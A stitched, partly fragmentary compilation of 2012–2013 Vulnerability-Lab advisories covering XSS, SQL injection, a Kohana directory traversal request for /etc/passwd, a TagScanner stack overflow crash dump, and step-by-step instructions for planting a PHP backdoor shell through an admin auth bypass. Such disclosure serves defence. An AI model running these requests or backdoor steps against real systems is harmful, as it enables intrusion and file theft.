= The security risk of the unauthorized shell upload exploit is estimated as high(+). Credits: JingoBD - (http://facebook.com/bdcyberarmy) Greetz: ManInDark,Rex0Man,Evil AXE,Bedu33n,NEEL,AXIOM, All Of My BCA Friends and BANGLADESHI Hacker Team. Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT
nCircle PureCloud Vulnerability Scanner - Multiple Web Vulnerabilities
[PERSISTENT/NON-PERSISTENT INJECTED SCRIPT CODE!])+%3C%22%5D%7D] Response Header: Date[Mon, 24 Dec 2012 20:13:25 GMT] Server[Apache] Content-Language[en] Content-Encoding[gzip] Vary[Accept-Language,Cookie,Accept-Encoding] X-Frame-Options[SAMEORIGIN] Content-Length[181] Keep-Alive[timeout=15, max=76] Connection[Keep-Alive] Content-Type[application/json] 1.2 The server-side (persistent) web vulnerability can be exploited by remote attackers and local privileged application user accounts with low user interaction. For demonstration or reproduce ... PoC: [VALID IP]%20'+%20[PERSISTENT SCRIPT CODE!]+... [VALID NAME]%20'+%20[PERSISTENT SCRIPT CODE!]+... Solution: = Parse the exception-handling error output listing and disallow error echos with requested web context. To fix the vulnerability parse the context of the input fields in the add devices module. Restrict the the input fields with a secure filter mask. Parse also the name ip scan index output listing and restrict the input of the requested web context scan listing. 2012-01-28: Vendor Fix/Patch by nCricle Dev Risk: = 1.1 The security risk of the client- and server-side post injection web vulnerability in the exception handling and listing is estimated as medium(+). 1.2 The security risk of the persistent input validation vulnerability in the scan index listing is estimated as medium(+). Credits: Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: resea...@vulnerability-lab.com
Fortinet FortiMail 400 IBE - Multiple Web Vulnerabilities
/FEAdmin.html#SystemBlackWhiteList Module: Bounce Verification - Username URL: https://209.87.230.132:1443/admin/FEAdmin.html#AsBounceverifyKeyCollection div id=ext-gen7197 class=ext-mb-contentspan id=ext-gen4185 class=ext-mb-text Invalid user name: iframe id=ext-gen19608 [PERSISTENT INJECTED SCRIPT CODE!];) = =[PERSISTENT INJECTED SCRIPT CODE!]) /iframe/span 1.2 The persistent vulnerability can be exploited by remote attackers with privileged application account and low required user inter action. For demonstration or reproduce ... Module: Upload or Import - Local Certificate - Certificate name URL: https://209.87.230.132:1443/admin/FEAdmin.html#SysCertificateDetailCollection div id=ext-gen38011 class=x-grid3-bodydiv id=ext-gen38041 class=x-grid3-row x-grid3-row-selected style=width: 1158px; table class=x-grid3-row-table style=width: 1158px; border=0 cellpadding=0 cellspacing=0tbodytrtd id=ext-gen38095 class=x-grid3-col x-grid3-cell x-grid3-td-mkey x-grid3-cell-first style=width:248px; tabindex=0div id=ext-gen38036 class=x-grid3-cell-inner x-grid3-col-mkey unselectable=on[PERSISTENT INJECTED SCRIPT CODE AS CERTIFICATE NAME!]/div/td td class=x-grid3-col x-grid3-cell x-grid3-td-subject style=width: 726px; tabindex=0div id=ext-gen38068 class=x-grid3-cell-inner x-grid3- col-subject unselectable=on/[PERSISTENT INJECTED SCRIPT CODE AS CERTIFICATE VIA INFORMATION!]/div/td td id=ext-gen38085 class=x-grid3-col x-grid3-cell x-grid3-td-status style=width:148px; tabindex=0div id=ext-gen38086 class=x-grid3-cell-inner x-grid3-col-status unselectable=onOK/div/tdtd id=ext-gen38084 class=x-grid3-col x-grid3-cell x-grid3-td-isReferenced x-grid3-cell-last style=width:28px; tabindex=0div class=x-grid3-cell-inner x-grid3-col-isReferenced unselectable=onimg src=images/gray-ball.png alt=0 align=absmiddle border=0/div/td/tr/tbody/table/divdiv id=ext-gen38040 class=x-grid3-row x-grid3-row-alt style=width: 1158px; table class=x-grid3-row-table style=width: 1158px; border=0 cellpadding=0 cellspacing=0tbodytrtd class=x-grid3-col x-grid3-cell x-grid3-td-mkey x-grid3-cell-first style=width:248px; tabindex=0div id=ext-gen38037 class=x-grid3-cell-inner x-grid3-col-mkey unselectable=on[PERSISTENT INJECTED SCRIPT CODE AS CERTIFICATE NAME!]/div/td td class=x-grid3-col x-grid3-cell x-grid3-td-subject style=width: 726px; tabindex=0div id=ext-gen38039 class=x-grid3-cell-inner x-grid3- col-subject unselectable=on[PERSISTENT INJECTED SCRIPT CODE AS CERTIFICATE VIA INFORMATION!]/div/tdtd class=x-grid3-col x-grid3-cell x-grid3-td-status style=width:148px; tabindex=0div id=ext-gen38102 class=x-grid3-cell-inner x-grid3-col-status unselectable=onDefault/div/tdtd id=ext-gen38101 class=x-grid3-col x-grid3-cell x-grid3-td- isReferenced x-grid3-cell-last style=width:28px; tabindex=0div id=ext-gen38083 class=x-grid3-cell-inner x-grid3-col-isReferenced unselectable=onimg id=ext-gen38100 src=images/red-ball.png alt=1 align=absmiddle border=0/div/td/tr/tbody/table/div/div Solution: = 1.1 The exception-handling vulnerability can be fixed by parsing the full content without excluding after a close tag. Restrict the input fields to allowed chars. 1.2 The persistent vulnerability in the certificate import/upload module can be patched by parsing the certificate name and info input field. Do not forget to parse also the vulnerable output listing of the certificate name and cert information. Risk: = The security risk of the of the exception-handling and input filter bypass vulnerability is estimated as high(-). Credits: Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability
Kohana Framework v2.3.3 - Directory Traversal Vulnerability
Title: == Kohana Framework v2.3.3 - Directory Traversal Vulnerability Date: = 2013-01-27 References: === http://www.vulnerability-lab.com/get_content.php?id=841 VL-ID: = 837 Common Vulnerability Scoring System: 7.1 Introduction: = Kohana is an open source, object oriented MVC web framework built using PHP5 by a team of volunteers that aims to be swift, secure, and small. (copy from vendor website) This is an OOP framework that is extremely DRY. Everything is built using strict PHP 5 classes and objects. Many common components are included: translation tools, database access, code profiling, encryption, validation, and more. Extending existing components and adding new libraries is very easy. Uses the BSD license, so you can use and modify it for commercial purposes. Benchmarking a framework is hard and rarely reflects the real world, but Kohana is very efficient and carefully optimized for real world usage. Very well commented code and a simple routing structure makes it easy to understand what is happening. Simple and effective tools help identify and solve performance issues quickly. (Copy of the Vendor Homepage: http://kohanaframework.org/ ) Abstract: = The Vulnerability Laboratory Research Team discovered a Directory Traversal web vulnerability in the Kohana v2.3.3 Content Management System. Report-Timeline: 2013-01-27: Public Disclosure Status: Published Affected Products: == Kohana Product: Framework - Content Management System 2.3.3 Exploitation-Technique: === Remote Severity: = High Details: A Directory Traversal web vulnerability is detected in the Kohana Content Management System web application. The vulnerability allows remote attackers to request local directories and files of the web server application system. The vulnerability is located in the `master/classes/Kohana/Filebrowser.php` file in line 90 when processing to request the path dir via replace. The filter replaces `../` by null and it applies on file reading requests. Review: Kohana/Filebrowser.php $thumb = Route::get('wysiwyg/filebrowser') -uri(array( 'action' = 'thumb', 'path' = str_replace(array($dir, DIRECTORY_SEPARATOR), array('', '/'), $filename) )); Remote attackers can bypass the validation with the vulnerable replace function in the file browser to read local web server files via directory (path) traversal attack. Exploitaton of the vulnerability requires no privileged application user account and no user interaction. Successful exploitation of the vulnerability results in read of arbitrary system files to compromise web server. Vulnerable Module(s): [+] Filebrowser Vulnerable Function(s): [+] str_replace dir Vulnerable Parameter(s): [+] ?path Proof of Concept: = The vulnerability can be exploited by remote attackers without privileged application user account and without required user interaction. For demonstration or reproduce ... Review: Kohana/Filebrowser.php $thumb = Route::get('wysiwyg/filebrowser') -uri(array( 'action' = 'thumb', 'path' = str_replace(array($dir, DIRECTORY_SEPARATOR), array('', '/'), $filename) )); Review: GET Request GET http://media.[server].com/directory/graphics/?path=..%2F..%2F..%2F%2F..%2F.. %2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F%2Fetc%2Fpasswd HTTP/1.0 Host: media.[server].com User-Agent: Kami VL PoC: http://media.[server].com/directory/graphics/?path=..%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F%2Fetc%2Fpasswd Risk: = The security risk of the directory traversal web vulnerability is estimated as high(+). Credits: Vulnerability Laboratory [Research Team] - Karim B. (k...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad
0day full - Free Monthly Websites v2.0 - Multiple Web Vulnerabilities
Navigation Page. Picture: http://i45.tinypic.com/vigzsp.png 3rd. Still at the same page, scroll down the page until you see this section : Sort Your Page Buttons/Links. Pic : http://i46.tinypic.com/1040oxg.png Change FROM dwi.php.html TO /dwi.php then Click Sort Navigation Pages. Picture: http://i49.tinypic.com/24ec1l0.jpg 4th. Go to Edit Navigation Page. http://www.massmoneywebsites.com/admin/edit_main_pages.php Please Select a Page To Edit: dwi.php.html --- Select that page. 5th. Inspect element on dwi.php.html Pic : http://i50.tinypic.com/29pq1ix.png Change FROM option value=dwi.php.html selected=dwi.php.html/option To option value=dwi.php selected=dwi.php/option Picture: http://i47.tinypic.com/wtb0j6.png 6th. Enter A Page Title As You Would Like It To Be Seen. Fill with dwi.php URL For This Page: main_pages/dwi.php Use the 'URL For This Page' field above: [Tick] Display This Page in Left Vertical Site Navigation: [Tick] Display This Page in Top Horizontal Site Navigation Buttons: [Tick] Picture: http://i46.tinypic.com/1zebnle.png 7th. Still at the same page, scroll down the page until you see this section : Enter Content For Your Page: Click SOURCE button Press Enter Twice at the First Line then Paste your PHP Backdoor/PHP Shell below. And Press Enter Twice at the Last Line. *Please see 2 Pictures below If you dunno Understand :p Picture 1 : http://i49.tinypic.com/1zlzxq0.png Picture 2 : http://i48.tinypic.com/291kc9h.png If you wanna do this, please remove your backdoor password. Click Save edited navigation page. 8th. After this message Data saved successfully Appeared, Visit the Home Page and you will see the Backdoor Page Picture : http://i49.tinypic.com/4rt1g4.png Risk: = The security risk of the unauthorized file upload vulnerability via auth bypass is estimated as critical. Credits: X-Cisadane - (stefanus...@ymail.com) Greetz 2: X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club and Ngobas Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: resea...@vulnerability-lab.com
Sonicwall Scrutinizer v9.5.2 - SQL Injection Vulnerability
Title: == Sonicwall Scrutinizer v9.5.2 - SQL Injection Vulnerability Date: = 2013-02-13 References: === http://www.vulnerability-lab.com/get_content.php?id=789 #9984: Investigate Vulnerability Lab issues (this ticket included tracking the creation of our DBI shim to error on semi-colon) #10149: Create a common function to escape characters that can be used for SQL injection #10139: Review all mapping and flow analytics queries to make sure inputs included in SQL are escaped #10141: Review all reporting and filtering queries to make sure inputs included in SQL are escaped #10140: Review all alarm tab and admin tab queries to make sure inputs included in SQL are escaped VL-ID: = 789 Common Vulnerability Scoring System: 7.3 Introduction: = Dell SonicWALL Scrutinizer is a multi-vendor, flow-based application traffic analytics, visualization and reporting tool to measure and troubleshoot network performance and utilization while increasing productivity for enterprises and service providers. Scrutinizer supports a wide range of routers, switches, firewalls, and data-flow reporting protocols, providing unparalleled insight into application traffic analysis from IPFIX/NetFlow data exported by Dell SonicWALL firewalls, as well as support for a wide range of routers, switches, firewalls, and data-flow reporting protocols. IT administrators in charge of high throughput networks can deploy Scrutinizer as a virtual appliance for high performance environments. (Copy of the Vendor Homepage: http://www.sonicwall.com/us/en/products/Scrutinizer.html ) Abstract: = The Vulnerability Laboratory Research Team discovered SQL Injection vulnerability in the Dells Sonicwall OEM Scrutinizer v9.5.2 appliance application. Report-Timeline: 2012-12-05: Researcher Notification Coordination 2012-12-07: Vendor Notification 2013-01-08: Vendor Response/Feedback 2013-02-10: Vendor Fix/Patch 2013-02-11: Public Disclosure Status: Published Affected Products: == DELL Product: Sonicwall OEM Scrutinizer 9.5.2 Exploitation-Technique: === Remote Severity: = High Details: A blind SQL Injection vulnerability is detected in the Sonicwall OEM Scrutinizer v9.5.2 appliance application. The bug allows remote attackers to execute/inject own sql statement/commands to manipulate the affected vulnerable application dbms. The sql injection vulnerability is located in the fa_web.cgi file with the bound gadget listing module and the vulnerable orderby or gadget parameters. Exploitation requires no user interaction without privileged application user account. Successful exploitation of the remote sql vulnerability results in dbms application compromise. Vulnerable File(s): [+] fa_web.cgi Vulnerable Module(s): [+] gadget listing Vulnerable Parameter(s): [+] orderby [+] gadget Proof of Concept: = The remote sql injection vulnerability can be exploited by remote attackers without required privileged application user account and also without user interaction. For demonstration or reproduce ... PoC: http://127.0.0.1:1339/cgi-bin/fa_web.cgi?gadget=applicationsbytes-1%27[SQL INJECTION VULNERABILITY!]orderby=1cachebreaker=23_52_5_814-1%27 http://127.0.0.1:1339/cgi-bin/fa_web.cgi?gadget=applicationsbytesorderby=-1%27[SQL INJECTION VULNERABILITY!]cachebreaker=23_52_5_814-1%27 Solution: = 1) Scrutinizer team created a own DB layer that will die if a semicolon is found within a SQL query 2) We have changed more queries to pass inputs as bound variables to the DB engine which prevents possible SQL injection Risk: = The security risk of the remote sql injection vulnerability is estimated as high(+). Credits: Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln
Sonicwall Scrutinizer v9.5.2 - SQL Injection Vulnerability
Title: == Sonicwall Scrutinizer v9.5.2 - SQL Injection Vulnerability Date: = 2013-02-13 References: === http://www.vulnerability-lab.com/get_content.php?id=789 #9984: Investigate Vulnerability Lab issues (this ticket included tracking the creation of our DBI shim to error on semi-colon) #10149: Create a common function to escape characters that can be used for SQL injection #10139: Review all mapping and flow analytics queries to make sure inputs included in SQL are escaped #10141: Review all reporting and filtering queries to make sure inputs included in SQL are escaped #10140: Review all alarm tab and admin tab queries to make sure inputs included in SQL are escaped VL-ID: = 789 Common Vulnerability Scoring System: 7.3 Introduction: = Dell SonicWALL Scrutinizer is a multi-vendor, flow-based application traffic analytics, visualization and reporting tool to measure and troubleshoot network performance and utilization while increasing productivity for enterprises and service providers. Scrutinizer supports a wide range of routers, switches, firewalls, and data-flow reporting protocols, providing unparalleled insight into application traffic analysis from IPFIX/NetFlow data exported by Dell SonicWALL firewalls, as well as support for a wide range of routers, switches, firewalls, and data-flow reporting protocols. IT administrators in charge of high throughput networks can deploy Scrutinizer as a virtual appliance for high performance environments. (Copy of the Vendor Homepage: http://www.sonicwall.com/us/en/products/Scrutinizer.html ) Abstract: = The Vulnerability Laboratory Research Team discovered SQL Injection vulnerability in the Dells Sonicwall OEM Scrutinizer v9.5.2 appliance application. Report-Timeline: 2012-12-05: Researcher Notification Coordination 2012-12-07: Vendor Notification 2013-01-08: Vendor Response/Feedback 2013-02-10: Vendor Fix/Patch 2013-02-11: Public Disclosure Status: Published Affected Products: == DELL Product: Sonicwall OEM Scrutinizer 9.5.2 Exploitation-Technique: === Remote Severity: = High Details: A blind SQL Injection vulnerability is detected in the Sonicwall OEM Scrutinizer v9.5.2 appliance application. The bug allows remote attackers to execute/inject own sql statement/commands to manipulate the affected vulnerable application dbms. The sql injection vulnerability is located in the fa_web.cgi file with the bound gadget listing module and the vulnerable orderby or gadget parameters. Exploitation requires no user interaction without privileged application user account. Successful exploitation of the remote sql vulnerability results in dbms application compromise. Vulnerable File(s): [+] fa_web.cgi Vulnerable Module(s): [+] gadget listing Vulnerable Parameter(s): [+] orderby [+] gadget Proof of Concept: = The remote sql injection vulnerability can be exploited by remote attackers without required privileged application user account and also without user interaction. For demonstration or reproduce ... PoC: http://127.0.0.1:1339/cgi-bin/fa_web.cgi?gadget=applicationsbytes-1%27[SQL INJECTION VULNERABILITY!]orderby=1cachebreaker=23_52_5_814-1%27 http://127.0.0.1:1339/cgi-bin/fa_web.cgi?gadget=applicationsbytesorderby=-1%27[SQL INJECTION VULNERABILITY!]cachebreaker=23_52_5_814-1%27 Solution: = 1) Scrutinizer team created a own DB layer that will die if a semicolon is found within a SQL query 2) We have changed more queries to pass inputs as bound variables to the DB engine which prevents possible SQL injection Risk: = The security risk of the remote sql injection vulnerability is estimated as high(+). Credits: Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln
MyFi Wireless Disk 1.2 iPad iPhone - Multiple Vulnerabilities
Title: == MyFi Wireless Disk 1.2 iPad iPhone - Multiple Vulnerabilities Date: = 2013-02-13 References: === http://www.vulnerability-lab.com/get_content.php?id=864 VL-ID: = 864 Status: Published Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2013 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: resea...@vulnerability-lab.com
Kayako Fusion v4.51.1891 - Multiple Web Vulnerabilities
[PERSISTENT INJECTED SCRIPT CODE!]%20%20%20%20[PERSISTENT INJECTED SCRIPT CODE!]) /div/div/div div id=gridcontentcustomfieldgroupgridform name=form_customfieldgroupgrid id=form_customfieldgroupgrid action=http://rem0ve.137.0.0.1:8080/admin/Base/CustomFieldGroup/Manage//; method=post onsubmit=javascript: return false; input autocomplete=OFF name=csrfhash value=z2hvplh1kar0dm8rzvwmln0ilddeunsc type=hiddendiv id=widthwrapper style=width: 100%; div id=gridtoolbardiv class=gridtoolbarnew id=gridextendedtoolbardiv class=gridtoolbarsub ullia href=http://rem0ve.137.0.0.1:8080/admin/Base/CustomFieldGroup/Insert; viewport=1img src=Manage-Dateien/icon_addplus.gif align=absmiddle border=0 New/a/li/ul/div/div Reference(s): http://rem0ve.137.0.0.1:8080/admin/Base/CustomFieldGroup/Manage Review: Live-Chat - Visitor Group Title div id= class=dialogcontainerdiv class=dialogok/divdiv class=dialogokcontainerdiv class=dialogtitle Inserted Visitor Group [PERSISTENT INJECTED SCRIPT CODE!]%20%20%20%20[PERSISTENT INJECTED SCRIPT CODE!]) /div ... or div class=ui-dialog-titlebar ui-widget-header ui-corner-all ui-helper-clearfixspan id=ui-dialog-title-window_editgroup class=ui-dialog-titleimg src=http://rem0ve.137.0.0.1:8080/__swift/themes/__cp/images/icon_window.gif; align=absmiddle border=0 Edit Visitor Group: [PERSISTENT INJECTED SCRIPT CODE!]%20%20%20%20[PERSISTENT INJECTED SCRIPT CODE!]) [PERSISTENT INJECTED SCRIPT CODE!]/span Reference(s): http://rem0ve.137.0.0.1:8080/admin/LiveChat/Group/Manage Risk: = The security risk of the persistent input validation web vulnerabilities are estimated as medium(+). Credits: Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2013 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: resea...@vulnerability-lab.com
TagScanner v5.1 - Stack Buffer Overflow Vulnerability
=00410041 edx=779cb46d esi= edi= eip=41414141 esp=0018ea90 ebp=0018eab0 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 Tagscan+0x10041: 41414141 add byte ptr [eax],al ds:002b:=?? 0:000 !exchain 0018eaa4: ntdll!LdrRemoveLoadAsDataTable+d64 (779cb46d) 0018eed0: Tagscan+14420 (00414420) 0018eef0: Tagscan+1ead78 (005ead78) 0018f154: Tagscan+10041 (41414141) Invalid exception stack at 41414141 0:000 u Tagscan+0x10041: 41414141 add byte ptr [eax],al 00410043 00ac004100 add byte ptr [eax+eax+41h],ch 0041004a add byte ptr [eax],al 0041004c add byte ptr [eax],al 0041004e add byte ptr [eax],al 00410050 add byte ptr [eax],al 00410052 add byte ptr [eax],al 00410054 94 xchgeax,esp 0:000 a 41414141 --- APPCrash Logs --- EventType=APPCRASH (BEX) EventTime=130029411726060019 ReportType=2 Consent=1 ReportIdentifier=ddec5c9b-6102-11e2-adfe-efaefe8363dd IntegratorReportIdentifier=ddec5c9a-6102-11e2-adfe-efaefe8363dd WOW64=1 Response.type=4 Sig[0].Name=Anwendungsname Sig[0].Value=Tagscan.exe Sig[1].Name=Anwendungsversion Sig[1].Value=5.1.6.30 Sig[2].Name=Anwendungszeitstempel Sig[2].Value=50f57b7e Sig[3].Name=Fehlermodulname Sig[3].Value=Tagscan.exe Sig[4].Name=Fehlermodulversion Sig[4].Value=5.1.6.30 Sig[5].Name=Fehlermodulzeitstempel Sig[5].Value=50f57b7e Sig[6].Name=Ausnahmecode Sig[6].Value=c005 Sig[7].Name=Ausnahmeoffset Sig[7].Value=41414141 DynamicSig[1].Name=Betriebsystemversion DynamicSig[1].Value=6.1.7601.2.1.0.768.3 